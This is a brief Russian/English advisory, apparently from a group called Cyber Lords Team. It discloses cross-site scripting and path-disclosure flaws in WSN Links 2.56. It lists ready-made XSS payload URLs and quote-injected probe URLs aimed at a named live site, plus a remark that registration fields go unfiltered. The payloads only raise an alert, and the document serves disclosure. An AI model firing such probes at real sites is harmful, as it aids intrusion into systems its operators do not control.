WSN Links 2.56
Home Page: http://scripts.webmastersite.net/wsnlinks/
Уязвимость/Vulnerability:
Межсайтовый скриптинг/Cross Site Scripting
http://links.allmoney.ws/memberlist.php?field=&ascdesc=&page=3&perpage=14"><script>alert()</script><"
http://links.allmoney.ws/memberlist.php?field=time&ascdesc=asc"><script>alert()</script><"&perpage=10
При регистрации пользователя, нет фильтрации полей личной информации.
Уязвимость/Vulnerability:
Раскрытие установочного пути/Exposure of installation path:
http://links.allmoney.ws/memberlist.php?field=&ascdesc=&page=3'&perpage=14
http://links.allmoney.ws/memberlist.php?action=profile&id=52'
http://links.allmoney.ws/link.php?id=100'
http://links.allmoney.ws/report.php?id=61'
http://links.allmoney.ws/email.php?id=61'
http://links.allmoney.ws/vote.php?id=61'
http://links.allmoney.ws/edit.php?action=comment&field=id&condition=equals&fieldvalue=3'
http://links.allmoney.ws/reportcomment.php?id=3'
http://links.allmoney.ws/search.php?filled=1&condition==&whichtype=links&searchfields[0]=ownerid&search=57'
Cyber Lords Team
www.cyberlords.net